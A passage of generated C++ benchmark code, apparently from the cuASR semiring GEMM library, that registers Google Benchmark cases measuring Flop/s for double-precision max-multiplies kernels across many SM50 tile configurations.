x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); 
} double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness 
cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, 
SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<64, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, 
MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = 
Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename 
cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = 
cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2(benchmark::State &state) { const auto N = 
static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2) 